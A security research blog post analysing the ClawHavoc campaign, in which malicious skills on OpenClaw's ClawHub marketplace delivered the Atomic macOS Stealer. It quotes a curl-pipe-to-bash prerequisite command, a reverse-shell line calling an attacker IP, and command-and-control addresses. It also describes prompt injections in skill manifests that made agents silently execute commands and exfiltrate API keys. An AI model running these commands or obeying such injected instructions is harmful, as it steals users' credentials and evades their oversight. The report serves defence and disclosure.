← Back to Webthreepedia
WEBTHREEPEDIA RESEARCH

[DEEP DIVE] ClawHavoc: 12% of a Marketplace Became Malware (3/10)

Zephyra|February 20, 2026|BPF
EXECUTIVE SUMMARY

On January 27, 2026, the first malicious skill appeared on ClawHub, OpenClaw's official plugin marketplace. Within three weeks, Koi Security researcher Oren Yomtov had identified 341 malicious skills out of 2,857 total — 11.9% of the registry. By February 16, that number had grown to 824 across a...

"OpenClaw is a security dumpster fire." — Laurie Voss, Head of Developer Relations at Arize, Founding CTO of npm

Executive Summary

On January 27, 2026, the first malicious skill appeared on ClawHub, OpenClaw's official plugin marketplace. Within three weeks, Koi Security researcher Oren Yomtov had identified 341 malicious skills out of 2,857 total — 11.9% of the registry. By February 16, that number had grown to 824 across an expanded registry of 10,700+ skills. Independent researcher @chiefofautism subsequently catalogued 1,184 malicious packages, with a single threat actor responsible for 677 of them.

The operation, codenamed ClawHavoc, delivered Atomic macOS Stealer (AMOS) — a commodity infostealer sold as malware-as-a-service on Telegram for $500–$1,000 per month. It harvested browser passwords, cryptocurrency wallets, SSH keys, macOS Keychain data, and OpenClaw configuration files containing API keys. Ninety-one percent of the malicious skills also embedded prompt injection, attacking the AI agent itself to silently execute commands without user visibility.

The most popular community skill on ClawHub — ranked #1 by downloads — was malware. Cisco's AI Defense team scanned it and found nine vulnerabilities, two critical. The marketplace that enabled all of this required nothing more than a one-week-old GitHub account to publish. No code review. No static analysis. No signing. No sandbox.

Table of Contents

  1. Discovery: Auditing 2,857 Skills
  2. The ClawHavoc Campaign: Anatomy of a Poisoning
  3. Attack Mechanics: Two Vectors, One Kill Chain
  4. The #1 Skill Was Malware
  5. Payload: Atomic macOS Stealer
  6. The npm/PyPI Parallel
  7. The Platform Response
  8. Key Takeaways
  9. Conclusion

Discovery: Auditing 2,857 Skills

Koi Security's Oren Yomtov conducted the first comprehensive audit of ClawHub in late January 2026. Working alongside an OpenClaw bot configured for threat analysis, Yomtov scanned all 2,857 skills available on the marketplace at that time.

The results: 341 malicious skills. Of those, 335 belonged to a single coordinated operation — ClawHavoc. The remaining six were independent malicious actors using different techniques but exploiting the same absence of platform controls.

"You install what looks like a legitimate skill — maybe solana-wallet-tracker or youtube-summarize-pro," Yomtov said. "The skill's documentation looks professional. But there's a 'Prerequisites' section that says you need to install something first."

Koi continued monitoring as ClawHub expanded. By February 16, 2026, the marketplace had grown to over 10,700 skills. Koi's confirmed malicious count had risen to 824 — the campaign was growing faster than the marketplace. A separate analysis by @chiefofautism identified 1,184 malicious packages total, finding that 12 compromised publisher accounts coordinated the campaign and that a single attacker had uploaded 677 packages — 57% of all malicious listings.

Separately, Snyk engineers scanned nearly 4,000 skills and found 283 (7.1%) exposed sensitive credentials through architectural flaws — not malice, but negligence. Skills like "buy-anything" tokenized credit card numbers, sending financial data through LLM context windows to model providers in plaintext. The marketplace's problems extended beyond deliberate poisoning into systemic insecurity.

The ClawHavoc Campaign: Anatomy of a Poisoning

ClawHavoc was not a lone actor uploading trojanized code. It was a coordinated operation with shared infrastructure, consistent tactics, and industrial-scale output.

All 335 skills in the primary campaign shared command-and-control infrastructure centered on IP address 91.92.242.30, with additional C2 nodes at 95.92.242.30, 96.92.242.30, 202.161.50.59, and 54.91.154.110. The skills followed a consistent pattern:

Category distribution of the 335 ClawHavoc skills:

| Category | Count | Examples | |----------|-------|---------| | YouTube utilities | 57 | youtube-summarize, thumbnail-grabber, video-downloader variants | | Polymarket bots | 34 | polymarket-25nwy through polymarket-z7lwp | | Solana wallets | 33 | solana-07bcb through solana-xx1q5 | | ClawHub typosquats | 29 | clawhub, clawhubb, clawwhub, cllawhub | | Phantom wallet | 28 | phantom-0jcvy through phantom-ygmjc | | Auto-updaters | 28 | update, updater, auto-updater variants | | X/Twitter trends | 25 | x-trends variants | | Yahoo Finance | 24 | yahoo-finance variants | | Google Workspace | 17 | gmail, calendar, sheets, drive integrations | | Ethereum gas tracker | 15 | ethereum-gas-tracker variants |

The targeting was deliberate. Cryptocurrency tools and financial trading bots attracted users most likely to have exchange API keys, wallet private keys, and high-value credentials on their machines. YouTube and social media tools provided volume. Typosquats of ClawHub itself — the marketplace's own name — caught users making typographical errors during installation.

Attack Mechanics: Two Vectors, One Kill Chain

ClawHavoc employed a dual-vector attack combining social engineering against humans and prompt injection against AI agents. Ninety-one percent of malicious skills used both simultaneously.

Vector 1: ClickFix Social Engineering

Each malicious skill contained a professionally formatted SKILL.md file — the Markdown manifest that OpenClaw reads to understand a skill's purpose and requirements. Embedded in the documentation was a "Prerequisites" section instructing users to execute shell commands before the skill would function:

curl -sL https://glot.io/raw/snippet | bash

The commands downloaded second-stage payloads from attacker infrastructure. On macOS, this was an obfuscated shell script containing base64-encoded commands that fetched a universal Mach-O binary (x86_64 + arm64) — the AMOS stealer, 521KB, with heavy string encryption. On Windows, users were directed to download password-protected ZIP files containing "openclaw-agent.exe" — the password requirement a deliberate technique to bypass antivirus scanning.

"The password-protected ZIP isn't for security. It's to evade antivirus scanning," Koi's analysis noted.

Vector 2: Prompt Injection Against the AI

The more significant vector targeted the AI agent itself. Skills embedded hidden instructions in their SKILL.md manifests — text that appeared normal to users reading documentation but contained directives that manipulated the LLM when the manifest entered the agent's context window.

These prompt injections directed OpenClaw to:

  • Execute curl commands silently, sending data to external servers
  • Redirect output to /dev/null to suppress any visible indication of malicious activity
  • Bypass safety guidelines designed to prevent unauthorized command execution
  • Exfiltrate environment variables, API keys, and session tokens

The user saw nothing. No confirmation dialog. No output. The AI agent, reading the manifest as part of its skill integration process, interpreted the hidden instructions as legitimate directives and executed them with the same OS-level privileges it held for all operations — full file system access, shell execution, and network connectivity.

This is the architectural failure at the core of OpenClaw's skill system: plugins execute with the same privileges as the parent process. There is no permission boundary between a skill that summarizes YouTube videos and a skill that exfiltrates SSH keys. Both run with identical access.

The #1 Skill Was Malware

Cisco's AI Defense team ran their Skill Scanner against OpenClaw's most popular community skill — "What Would Elon Do?" — which had achieved the #1 ranking on ClawHub. The skill had been gamed to the top through approximately 4,000 fabricated downloads before accumulating thousands of legitimate installs from users who trusted the ranking.

Cisco found nine security vulnerabilities. Two were critical:

  1. Active data exfiltration: The skill executed a curl command that silently sent data to an attacker-controlled server at https://clawbub-skill.com/log, with output redirected to /dev/null to avoid detection.
  2. Direct prompt injection: The skill forced the AI assistant to bypass internal safety guidelines and execute commands without user consent.

The five high-severity findings included command injection via embedded bash commands, tool poisoning with malicious payloads in skill files, and authentication bypass vulnerabilities.

Cisco identified four enterprise risk categories emerging from the ClawHub model: AI agents with system access functioning as covert data-leak channels that bypass traditional security tools; LLMs serving as execution orchestrators where prompts become undetectable instructions; malicious skills artificially ranking high in repositories to amplify supply chain compromise at scale; and shadow AI emerging when employees unknowingly deploy compromised agents as productivity tools.

Payload: Atomic macOS Stealer

The primary payload delivered by ClawHavoc was Atomic macOS Stealer (AMOS), a commodity infostealer available as malware-as-a-service on Telegram channels for $500–$1,000 per month. AMOS is not novel malware. It is a well-documented, commercially distributed credential harvesting tool. The ClawHavoc operators were customers, not developers.

AMOS capabilities deployed through ClawHub skills:

  • Browser data extraction: Passwords, cookies, autofill data, and session tokens from Chrome, Safari, Firefox, Brave, and Edge
  • Cryptocurrency wallets: Private keys and seed phrases from 60+ wallet applications including Phantom, MetaMask, and Solana-based wallets
  • macOS Keychain: Full extraction of stored credentials and certificates
  • SSH keys: Private keys enabling access to remote servers and infrastructure
  • Telegram session data: Session files enabling account hijacking
  • OpenClaw configuration files: API keys from ~/.clawdbot/.env containing Anthropic, OpenAI, and other LLM provider credentials — each worth direct financial value

The six outlier skills — those not part of the main ClawHavoc cluster — used different techniques. "better-polymarket" and "polymarket-all-in-one" contained reverse shell backdoors triggered during normal operation: os.system("curl -s http://54.91.154.110:13338/|sh") granted attackers interactive access to the victim's system. "rankaj" performed direct credential exfiltration from ~/.clawdbot/.env to webhook.site.

VirusTotal analyzed over 3,016 skills using their Code Insight capability and identified a single publisher, "hightower6eu," responsible for 314 malicious uploads. VirusTotal characterized the ecosystem as "a malware delivery channel," identifying large-scale distribution of stealers and droppers embedded within skill packages.

The npm/PyPI Parallel

ClawHub reproduced, almost exactly, the supply chain vulnerabilities that npm, PyPI, and Docker Hub spent a decade learning to mitigate — then failed to implement any of the solutions.

The parallels are structural:

Identity verification: npm suffered repeated compromises through stolen maintainer tokens before implementing Trusted Publishing with OIDC-based provenance attestation. ClawHub required only a one-week-old GitHub account. No verified identity. No two-factor authentication requirement. No provenance chain.

Code review: PyPI implemented malware scanning through the PyPI Malware Checks project, TrustedPublisher verification, and mandatory 2FA for critical packages after repeated typosquatting campaigns. ClawHub had no automated scanning at launch, no manual review, no static analysis.

Signing and verification: npm introduced package signing. Docker Hub implemented content trust with Notary. ClawHub skills were unsigned Markdown files and shell scripts.

Sandboxing: Even traditional package managers, which already isolate packages during installation, faced devastating supply chain attacks — the event-stream compromise (npm, 2018), the ua-parser-js hijack (npm, 2021), and dozens of PyPI typosquatting campaigns. ClawHub skills ran with full OS privileges of the parent process. No sandbox. No capability restrictions. No permission model.

The difference in consequences is also structural. When a malicious npm package runs postinstall scripts, it has the permissions of the Node.js process. When a malicious ClawHub skill runs through OpenClaw, it has the permissions of an AI agent with access to email, calendar, messaging, file system, browser, shell commands, and 50+ integrations. The blast radius of a compromised OpenClaw skill dwarfs that of a compromised npm package.

As the Netizen blog's analysis of the ClawHub incident concluded: "Supply chain compromise at the automation layer" transforms "the distribution channel" into an attack surface where "the execution engine is the agent runtime sitting inside an enterprise endpoint." Traditional static screening — signature scanning, account age requirements — cannot serve as the sole defense.

The Platform Response

The initial response was community-driven. Peter Steinberger activated a reporting mechanism allowing signed-in users to flag suspicious skills, with automatic hiding after three independent reports. This was a moderation tool, not a security control.

Following the Koi Security disclosure, OpenClaw partnered with VirusTotal to scan skills uploaded to ClawHub. Steinberger stated that "all skills published to ClawHub are now scanned using VirusTotal's threat intelligence, including their new Code Insight capability." VirusTotal added native support for OpenClaw skill packages in their analysis pipeline.

Koi Security developed Clawdex, a skill for pre-installation scanning that checks skills against a database of known malicious packages before payload execution. Cisco released Skill Scanner, an open-source tool combining static analysis, behavioral analysis, LLM-assisted semantic analysis, and VirusTotal integration.

These are reactive measures. They arrived after 1,184 malicious skills had already been distributed. The marketplace operated for weeks with no scanning, no review, and no sandboxing. The question is not whether the response was adequate. The question is why a skill marketplace connected to an AI agent with full system access launched without these controls in the first place.

Key Takeaways

  • 1,184 malicious skills were identified on ClawHub, representing approximately 12% of the registry at peak compromise. A single attacker uploaded 677 packages.
  • 91% of malicious skills used prompt injection to attack the AI agent directly, executing commands silently without user awareness. The AI became the attack vector.
  • The #1 community skill on ClawHub was malware — "What Would Elon Do?" — with nine vulnerabilities including active data exfiltration and prompt injection, discovered by Cisco's AI Defense team.
  • Publishing requirements were functionally nonexistent: a GitHub account one week old, a SKILL.md file, and a repository. No code review, no signing, no sandbox, no static analysis.
  • ClawHub replicated every known supply chain vulnerability from npm, PyPI, and Docker Hub while implementing none of the mitigations those ecosystems developed over a decade.
  • AMOS stealer extracted browser credentials, 60+ cryptocurrency wallets, SSH keys, macOS Keychain data, Telegram sessions, and OpenClaw API keys — all from a single malicious skill installation.

Conclusion

ClawHavoc was not a sophisticated attack. It did not exploit a zero-day vulnerability or bypass advanced security controls. It exploited the absence of controls. The attackers used commodity malware, recycled social engineering techniques, and the same typosquatting strategies that have plagued package managers for years. The only innovation was the target: an AI agent that multiplied the impact of each compromise by granting access to everything on the victim's machine.

The lesson from npm's event-stream incident in 2018 was that open-source marketplaces require active security investment proportional to their blast radius. The lesson from PyPI's repeated typosquatting campaigns was that account age alone is not a meaningful identity verification. The lesson from Docker Hub's trojanized images was that container registries need content trust and signing.

ClawHub ignored all of these lessons. It launched a skill marketplace connected to an agent with root-level access to users' digital lives, and the only barrier to entry was a seven-day-old GitHub account.

Part 4 of this series examines the infostealer campaigns targeting OpenClaw users directly — the Vidar variants harvesting gateway tokens, device keys, and memory files from machines where OpenClaw was installed.

Sources & References

  1. Researchers Find 341 Malicious ClawHub Skills Stealing Data from OpenClaw Users — The Hacker News, Feb 2, 2026
  2. ClawHavoc: 341 Malicious Skills Found by the Bot They Were Targeting — Koi Security, primary research disclosure
  3. Personal AI Agents like OpenClaw Are a Security Nightmare — Cisco Blogs, AI Defense team analysis
  4. The #1 Skill on OpenClaw's Marketplace Was Malware: Inside the ClawHub Supply Chain Attack — Awesome Agents
  5. It's Easy to Backdoor OpenClaw, and Its Skills Leak API Keys — The Register, Feb 5, 2026
  6. From Automation to Infection: How OpenClaw AI Agent Skills Are Being Weaponized — VirusTotal Blog, Feb 2026
  7. ClawHavoc Poisoned OpenClaw's ClawHub with 1,184 Malicious Skills — Cybersecurity News
  8. OpenClaw, Agent Skills, and the Expansion of the Software Supply Chain — Netizen Blog, Feb 19, 2026
  9. DIY AI Bot Farm OpenClaw Is a Security 'Dumpster Fire' — The Register, Feb 3, 2026
  10. Securing OpenClaw Against ClawHavoc — Security Boulevard, Feb 2026